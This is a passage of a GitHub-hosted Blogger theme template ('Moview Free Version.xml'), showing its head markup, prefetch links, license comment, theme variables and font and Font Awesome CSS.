-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathMoview Free Version.xml
2487 lines (2380 loc) · 182 KB
/
Moview Free Version.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
<head>
<meta content='width=device-width, initial-scale=1' name='viewport'/>
<b:include data='blog' name='all-head-content'/>
<b:if cond='data:blog.pageType == "index"'>
<title><data:blog.pageTitle/></title>
<b:else/>
<b:if cond='data:blog.pageType != "error_page"'>
<title><data:blog.pageName/></title>
</b:if></b:if>
<b:if cond='data:blog.pageType == "error_page"'>
<title>Page Not Found - <data:blog.title/></title>
</b:if>
<include expiration='7d' path='*.css'/>
<include expiration='7d' path='*.js'/>
<include expiration='3d' path='*.gif'/>
<include expiration='3d' path='*.jpeg'/>
<include expiration='3d' path='*.jpg'/>
<include expiration='3d' path='*.png'/>
<link expr:href='data:blog.url' rel='dns-prefetch'/>
<link href='https://www.google-analytics.com/' rel='dns-prefetch'/>
<link href='https://pagead2.googlesyndication.com/' rel='dns-prefetch'/>
<link href='https://www.facebook.com/' rel='dns-prefetch'/>
<link href='https://static.xx.fbcdn.net/' rel='dns-prefetch'/>
<link href='https://www.googletagservices.com/' rel='dns-prefetch'/>
<link href='https://apis.google.com/' rel='dns-prefetch'/>
<link href='https://ajax.googleapis.com/' rel='dns-prefetch'/>
<link href='https://fonts.gstatic.com/' rel='dns-prefetch'/>
<link href='https://maxcdn.bootstrapcdn.com/' rel='dns-prefetch'/>
<link href='https://www.blogger.com' rel='dns-prefetch'/>
<link href='https://fonts.googleapis.com/' rel='dns-prefetch'/>
<link href='https://1.bp.blogspot.com/' rel='dns-prefetch'/>
<link href='https://2.bp.blogspot.com/' rel='dns-prefetch'/>
<link href='https://3.bp.blogspot.com/' rel='dns-prefetch'/>
<link href='https://4.bp.blogspot.com/' rel='dns-prefetch'/>
<link href='https://googleads.g.doubleclick.net/' rel='dns-prefetch'/>
<link href='https://secure.rating-widget.com' rel='dns-prefetch'/>
<b:skin><![CDATA[
/*
Theme Name : Moview
Theme Designer : MS Design
Designer URL : http://msdesignbd.com
Publisher : Template Market
Publisher URL : http://templatemark.com
====================================================================
License : This free Blogger template is licensed under the Creative Commons Attribution 3.0 License, which permits both personal and commercial use. However, to satisfy the 'attribution' clause of the license, you are required to keep the footer links intact which provides due credit to its authors. For more specific details about the license, you may visit the URL below:
http://creativecommons.org/licenses/by/3.0/
====================================================================
*/
/* Variable definitions
====================
<Variable name="keycolor" description="Main Color" type="color" default="#ff4444" value="#ff4444"/>
<Group description="links color" selector="body">
<Variable name="main.color" description="Main Theme Color" type="color" default="#ff4444" value="#ff4444"/>
</Group>
<Group description="Comment Section">
<Variable name="body.background" description="Body Background" type="background" color="#dddfe2" default="#dddfe2 none repeat scroll top left" value="#dddfe2 none repeat scroll top left"/>
<Variable name="body.font" description="Font" type="font" default="normal 400 14px Roboto, Arial, sans-serif" value="normal 400 14px Arial,sans-serif"/>
<Variable name="body.text.color" description="Text Color" type="color" default="#1d2129" value="#1d2129"/>
<Variable name="body.text.font" description="1" type="font" default="$(body.font)" value="normal 400 14px Roboto,Arial,sans-serif"/>
<Variable name="posts.background.color" description="2" type="color" default="#fff" value="#ffffff"/>
<Variable name="body.link.color" description="3" type="color" default="#ff5e15" value="#ff5e15"/>
<Variable name="body.link.visited.color" description="4" type="color" default="#ff5e15" value="#ff5e15"/>
<Variable name="body.link.hover.color" description="5" type="color" default="#1d2129" value="#1d2129"/>
<Variable name="blog.title.font" description="6" type="font" default="$(body.text.font)" value="normal 400 14px Roboto, Arial, sans-serif"/>
<Variable name="blog.title.color" description="7" type="color" default="#fff" value="#ffffff"/>
<Variable name="header.icons.color" description="8" type="color" default="#fff" value="#ffffff"/>
<Variable name="tabs.font" description="9" type="font" default="$(body.text.font)" value="normal 400 14px Arial,sans-serif"/>
<Variable name="tabs.color" description="10" type="color" default="#ccc" value="#cccccc"/>
<Variable name="tabs.selected.color" description="11" type="color" default="#fff" value="#ffffff"/>
<Variable name="tabs.overflow.background.color" description="12" type="color" default="#fff" value="#ffffff"/>
<Variable name="tabs.overflow.color" description="13" type="color" default="$(body.text.color)" value="#1d2129"/>
<Variable name="tabs.overflow.selected.color" description="14" type="color" default="$(body.text.color)" value="#1d2129"/>
<Variable name="posts.title.color" description="15" type="color" default="$(body.text.color)" value="#1d2129"/>
<Variable name="posts.title.font" description="16" type="font" default="$(body.text.font)" value="normal 400 14px Arial,sans-serif"/>
<Variable name="posts.text.font" description="17" type="font" default="$(body.text.font)" value="normal 400 14px Arial,sans-serif"/>
<Variable name="posts.text.color" description="18" type="color" default="$(body.text.color)" value="#1d2129"/>
<Variable name="posts.icons.color" description="19" type="color" default="$(body.text.color)" value="#6c6f74"/>
<Variable name="labels.background.color" description="20" type="color" default="#ff5e15" value="#ff5e15"/>
</Group>
*/
/* devanagari */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 400; src: local('Poppins Regular'), local('Poppins-Regular'), url(https://fonts.gstatic.com/s/poppins/v9/pxiEyp8kv8JHgFVrJJbecmNE.woff2) format('woff2'); unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB; } /* latin-ext */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 400; src: local('Poppins Regular'), local('Poppins-Regular'), url(https://fonts.gstatic.com/s/poppins/v9/pxiEyp8kv8JHgFVrJJnecmNE.woff2) format('woff2'); unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; } /* latin */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 400; src: local('Poppins Regular'), local('Poppins-Regular'), url(https://fonts.gstatic.com/s/poppins/v9/pxiEyp8kv8JHgFVrJJfecg.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; } /* devanagari */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 500; src: local('Poppins Medium'), local('Poppins-Medium'), url(https://fonts.gstatic.com/s/poppins/v9/pxiByp8kv8JHgFVrLGT9Z11lFc-K.woff2) format('woff2'); unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB; } /* latin-ext */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 500; src: local('Poppins Medium'), local('Poppins-Medium'), url(https://fonts.gstatic.com/s/poppins/v9/pxiByp8kv8JHgFVrLGT9Z1JlFc-K.woff2) format('woff2'); unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; } /* latin */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 500; src: local('Poppins Medium'), local('Poppins-Medium'), url(https://fonts.gstatic.com/s/poppins/v9/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; } /* devanagari */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 600; src: local('Poppins SemiBold'), local('Poppins-SemiBold'), url(https://fonts.gstatic.com/s/poppins/v9/pxiByp8kv8JHgFVrLEj6Z11lFc-K.woff2) format('woff2'); unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB; } /* latin-ext */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 600; src: local('Poppins SemiBold'), local('Poppins-SemiBold'), url(https://fonts.gstatic.com/s/poppins/v9/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2) format('woff2'); unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; } /* latin */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 600; src: local('Poppins SemiBold'), local('Poppins-SemiBold'), url(https://fonts.gstatic.com/s/poppins/v9/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; } /* devanagari */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 700; src: local('Poppins Bold'), local('Poppins-Bold'), url(https://fonts.gstatic.com/s/poppins/v9/pxiByp8kv8JHgFVrLCz7Z11lFc-K.woff2) format('woff2'); unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB; } /* latin-ext */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 700; src: local('Poppins Bold'), local('Poppins-Bold'), url(https://fonts.gstatic.com/s/poppins/v9/pxiByp8kv8JHgFVrLCz7Z1JlFc-K.woff2) format('woff2'); unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; } /* latin */ @font-face { font-family: 'Poppins'; font-style: normal; font-weight: 700; src: local('Poppins Bold'), local('Poppins-Bold'), url(https://fonts.gstatic.com/s/poppins/v9/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; }
/* Fontawesome */
@font-face{font-family:'FontAwesome';src:url('https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.eot?v=4.7.0');src:url('https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{padding-left:0;margin-left:2.14285714em;list-style-type:none}.fa-ul>li{position:relative}.fa-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.fa-li.fa-lg{left:-1.85714286em}.fa-border{padding:.2em .25em .15em;border:solid .08em #eee;border-radius:.1em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left{margin-right:.3em}.fa.fa-pull-right{margin-left:.3em}.pull-right{float:right}.pull-left{float:left}.fa.pull-left{margin-right:.3em}.fa.pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s infinite linear;animation:fa-spin 2s infinite linear}.fa-pulse{-webkit-animation:fa-spin 1s infinite steps(8);animation:fa-spin 1s infinite steps(8)}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-rotate-90{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";-webkit-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";-webkit-transform:rotate(180deg);-ms-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";-webkit-transform:rotate(270deg);-ms-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";-webkit-transform:scale(-1, 1);-ms-transform:scale(-1, 1);transform:scale(-1, 1)}.fa-flip-vertical{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";-webkit-transform:scale(1, -1);-ms-transform:scale(1, -1);transform:scale(1, -1)}:root .fa-rotate-90,:root .fa-rotate-180,:root .fa-rotate-270,:root .fa-flip-horizontal,:root .fa-flip-vertical{filter:none}.fa-stack{position:relative;display:inline-block;width:2em;height:2em;line-height:2em;vertical-align:middle}.fa-stack-1x,.fa-stack-2x{position:absolute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002"}.fa-envelope-o:before{content:"\f003"}.fa-heart:before{content:"\f004"}.fa-star:before{content:"\f005"}.fa-star-o:before{content:"\f006"}.fa-user:before{content:"\f007"}.fa-film:before{content:"\f008"}.fa-th-large:before{content:"\f009"}.fa-th:before{content:"\f00a"}.fa-th-list:before{content:"\f00b"}.fa-check:before{content:"\f00c"}.fa-remove:before,.fa-close:before,.fa-times:before{content:"\f00d"}.fa-search-plus:before{content:"\f00e"}.fa-search-minus:before{content:"\f010"}.fa-power-off:before{content:"\f011"}.fa-signal:before{content:"\f012"}.fa-gear:before,.fa-cog:before{content:"\f013"}.fa-trash-o:before{content:"\f014"}.fa-home:before{content:"\f015"}.fa-file-o:before{content:"\f016"}.fa-clock-o:before{content:"\f017"}.fa-road:before{content:"\f018"}.fa-download:before{content:"\f019"}.fa-arrow-circle-o-down:before{content:"\f01a"}.fa-arrow-circle-o-up:before{content:"\f01b"}.fa-inbox:before{content:"\f01c"}.fa-play-circle-o:before{content:"\f01d"}.fa-rotate-right:before,.fa-repeat:before{content:"\f01e"}.fa-refresh:before{content:"\f021"}.fa-list-alt:before{content:"\f022"}.fa-lock:before{content:"\f023"}.fa-flag:before{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before{content:"\f02a"}.fa-tag:before{content:"\f02b"}.fa-tags:before{content:"\f02c"}.fa-book:before{content:"\f02d"}.fa-bookmark:before{content:"\f02e"}.fa-print:before{content:"\f02f"}.fa-camera:before{content:"\f030"}.fa-font:before{content:"\f031"}.fa-bold:before{content:"\f032"}.fa-italic:before{content:"\f033"}.fa-text-height:before{content:"\f034"}.fa-text-width:before{content:"\f035"}.fa-align-left:before{content:"\f036"}.fa-align-center:before{content:"\f037"}.fa-align-right:before{content:"\f038"}.fa-align-justify:before{content:"\f039"}.fa-list:before{content:"\f03a"}.fa-dedent:before,.fa-outdent:before{content:"\f03b"}.fa-indent:before{content:"\f03c"}.fa-video-camera:before{content:"\f03d"}.fa-photo:before,.fa-image:before,.fa-picture-o:before{content:"\f03e"}.fa-pencil:before{content:"\f040"}.fa-map-marker:before{content:"\f041"}.fa-adjust:before{content:"\f042"}.fa-tint:before{content:"\f043"}.fa-edit:before,.fa-pencil-square-o:before{content:"\f044"}.fa-share-square-o:before{content:"\f045"}.fa-check-square-o:before{content:"\f046"}.fa-arrows:before{content:"\f047"}.fa-step-backward:before{content:"\f048"}.fa-fast-backward:before{content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{content:"\f050"}.fa-step-forward:before{content:"\f051"}.fa-eject:before{content:"\f052"}.fa-chevron-left:before{content:"\f053"}.fa-chevron-right:before{content:"\f054"}.fa-plus-circle:before{content:"\f055"}.fa-minus-circle:before{content:"\f056"}.fa-times-circle:before{content:"\f057"}.fa-check-circle:before{content:"\f058"}.fa-question-circle:before{content:"\f059"}.fa-info-circle:before{content:"\f05a"}.fa-crosshairs:before{content:"\f05b"}.fa-times-circle-o:before{content:"\f05c"}.fa-check-circle-o:before{content:"\f05d"}.fa-ban:before{content:"\f05e"}.fa-arrow-left:before{content:"\f060"}.fa-arrow-right:before{content:"\f061"}.fa-arrow-up:before{content:"\f062"}.fa-arrow-down:before{content:"\f063"}.fa-mail-forward:before,.fa-share:before{content:"\f064"}.fa-expand:before{content:"\f065"}.fa-compress:before{content:"\f066"}.fa-plus:before{content:"\f067"}.fa-minus:before{content:"\f068"}.fa-asterisk:before{content:"\f069"}.fa-exclamation-circle:before{content:"\f06a"}.fa-gift:before{content:"\f06b"}.fa-leaf:before{content:"\f06c"}.fa-fire:before{content:"\f06d"}.fa-eye:before{content:"\f06e"}.fa-eye-slash:before{content:"\f070"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:before{content:"\f076"}.fa-chevron-up:before{content:"\f077"}.fa-chevron-down:before{content:"\f078"}.fa-retweet:before{content:"\f079"}.fa-shopping-cart:before{content:"\f07a"}.fa-folder:before{content:"\f07b"}.fa-folder-open:before{content:"\f07c"}.fa-arrows-v:before{content:"\f07d"}.fa-arrows-h:before{content:"\f07e"}.fa-bar-chart-o:before,.fa-bar-chart:before{content:"\f080"}.fa-twitter-square:before{content:"\f081"}.fa-facebook-square:before{content:"\f082"}.fa-camera-retro:before{content:"\f083"}.fa-key:before{content:"\f084"}.fa-gears:before,.fa-cogs:before{content:"\f085"}.fa-comments:before{content:"\f086"}.fa-thumbs-o-up:before{content:"\f087"}.fa-thumbs-o-down:before{content:"\f088"}.fa-star-half:before{content:"\f089"}.fa-heart-o:before{content:"\f08a"}.fa-sign-out:before{content:"\f08b"}.fa-linkedin-square:before{content:"\f08c"}.fa-thumb-tack:before{content:"\f08d"}.fa-external-link:before{content:"\f08e"}.fa-sign-in:before{content:"\f090"}.fa-trophy:before{content:"\f091"}.fa-github-square:before{content:"\f092"}.fa-upload:before{content:"\f093"}.fa-lemon-o:before{content:"\f094"}.fa-phone:before{content:"\f095"}.fa-square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{content:"\f09b"}.fa-unlock:before{content:"\f09c"}.fa-credit-card:before{content:"\f09d"}.fa-feed:before,.fa-rss:before{content:"\f09e"}.fa-hdd-o:before{content:"\f0a0"}.fa-bullhorn:before{content:"\f0a1"}.fa-bell:before{content:"\f0f3"}.fa-certificate:before{content:"\f0a3"}.fa-hand-o-right:before{content:"\f0a4"}.fa-hand-o-left:before{content:"\f0a5"}.fa-hand-o-up:before{content:"\f0a6"}.fa-hand-o-down:before{content:"\f0a7"}.fa-arrow-circle-left:before{content:"\f0a8"}.fa-arrow-circle-right:before{content:"\f0a9"}.fa-arrow-circle-up:before{content:"\f0aa"}.fa-arrow-circle-down:before{content:"\f0ab"}.fa-globe:before{content:"\f0ac"}.fa-wrench:before{content:"\f0ad"}.fa-tasks:before{content:"\f0ae"}.fa-filter:before{content:"\f0b0"}.fa-briefcase:before{content:"\f0b1"}.fa-arrows-alt:before{content:"\f0b2"}.fa-group:before,.fa-users:before{content:"\f0c0"}.fa-chain:before,.fa-link:before{content:"\f0c1"}.fa-cloud:before{content:"\f0c2"}.fa-flask:before{content:"\f0c3"}.fa-cut:before,.fa-scissors:before{content:"\f0c4"}.fa-copy:before,.fa-files-o:before{content:"\f0c5"}.fa-paperclip:before{content:"\f0c6"}.fa-save:before,.fa-floppy-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:before{content:"\f0cc"}.fa-underline:before{content:"\f0cd"}.fa-table:before{content:"\f0ce"}.fa-magic:before{content:"\f0d0"}.fa-truck:before{content:"\f0d1"}.fa-pinterest:before{content:"\f0d2"}.fa-pinterest-square:before{content:"\f0d3"}.fa-google-plus-square:before{content:"\f0d4"}.fa-google-plus:before{content:"\f0d5"}.fa-money:before{content:"\f0d6"}.fa-caret-down:before{content:"\f0d7"}.fa-caret-up:before{content:"\f0d8"}.fa-caret-left:before{content:"\f0d9"}.fa-caret-right:before{content:"\f0da"}.fa-columns:before{content:"\f0db"}.fa-unsorted:before,.fa-sort:before{content:"\f0dc"}.fa-sort-down:before,.fa-sort-desc:before{content:"\f0dd"}.fa-sort-up:before,.fa-sort-asc:before{content:"\f0de"}.fa-envelope:before{content:"\f0e0"}.fa-linkedin:before{content:"\f0e1"}.fa-rotate-left:before,.fa-undo:before{content:"\f0e2"}.fa-legal:before,.fa-gavel:before{content:"\f0e3"}.fa-dashboard:before,.fa-tachometer:before{content:"\f0e4"}.fa-comment-o:before{content:"\f0e5"}.fa-comments-o:before{content:"\f0e6"}.fa-flash:before,.fa-bolt:before{content:"\f0e7"}.fa-sitemap:before{content:"\f0e8"}.fa-umbrella:before{content:"\f0e9"}.fa-paste:before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{content:"\f0f0"}.fa-stethoscope:before{content:"\f0f1"}.fa-suitcase:before{content:"\f0f2"}.fa-bell-o:before{content:"\f0a2"}.fa-coffee:before{content:"\f0f4"}.fa-cutlery:before{content:"\f0f5"}.fa-file-text-o:before{content:"\f0f6"}.fa-building-o:before{content:"\f0f7"}.fa-hospital-o:before{content:"\f0f8"}.fa-ambulance:before{content:"\f0f9"}.fa-medkit:before{content:"\f0fa"}.fa-fighter-jet:before{content:"\f0fb"}.fa-beer:before{content:"\f0fc"}.fa-h-square:before{content:"\f0fd"}.fa-plus-square:before{content:"\f0fe"}.fa-angle-double-left:before{content:"\f100"}.fa-angle-double-right:before{content:"\f101"}.fa-angle-double-up:before{content:"\f102"}.fa-angle-double-down:before{content:"\f103"}.fa-angle-left:before{content:"\f104"}.fa-angle-right:before{content:"\f105"}.fa-angle-up:before{content:"\f106"}.fa-angle-down:before{content:"\f107"}.fa-desktop:before{content:"\f108"}.fa-laptop:before{content:"\f109"}.fa-tablet:before{content:"\f10a"}.fa-mobile-phone:before,.fa-mobile:before{content:"\f10b"}.fa-circle-o:before{content:"\f10c"}.fa-quote-left:before{content:"\f10d"}.fa-quote-right:before{content:"\f10e"}.fa-spinner:before{content:"\f110"}.fa-circle:before{content:"\f111"}.fa-mail-reply:before,.fa-reply:before{content:"\f112"}.fa-github-alt:before{content:"\f113"}.fa-folder-o:before{content:"\f114"}.fa-folder-open-o:before{content:"\f115"}.fa-smile-o:before{content:"\f118"}.fa-frown-o:before{content:"\f119"}.fa-meh-o:before{content:"\f11a"}.fa-gamepad:before{content:"\f11b"}.fa-keyboard-o:before{content:"\f11c"}.fa-flag-o:before{content:"\f11d"}.fa-flag-checkered:before{content:"\f11e"}.fa-terminal:before{content:"\f120"}.fa-code:before{content:"\f121"}.fa-mail-reply-all:before,.fa-reply-all:before{content:"\f122"}.fa-star-half-empty:before,.fa-star-half-full:before,.fa-star-half-o:before{content:"\f123"}.fa-location-arrow:before{content:"\f124"}.fa-crop:before{content:"\f125"}.fa-code-fork:before{content:"\f126"}.fa-unlink:before,.fa-chain-broken:before{content:"\f127"}.fa-question:before{content:"\f128"}.fa-info:before{content:"\f129"}.fa-exclamation:before{content:"\f12a"}.fa-superscript:before{content:"\f12b"}.fa-subscript:before{content:"\f12c"}.fa-eraser:before{content:"\f12d"}.fa-puzzle-piece:before{content:"\f12e"}.fa-microphone:before{content:"\f130"}.fa-microphone-slash:before{content:"\f131"}.fa-shield:before{content:"\f132"}.fa-calendar-o:before{content:"\f133"}.fa-fire-extinguisher:before{content:"\f134"}.fa-rocket:before{content:"\f135"}.fa-maxcdn:before{content:"\f136"}.fa-chevron-circle-left:before{content:"\f137"}.fa-chevron-circle-right:before{content:"\f138"}.fa-chevron-circle-up:before{content:"\f139"}.fa-chevron-circle-down:before{content:"\f13a"}.fa-html5:before{content:"\f13b"}.fa-css3:before{content:"\f13c"}.fa-anchor:before{content:"\f13d"}.fa-unl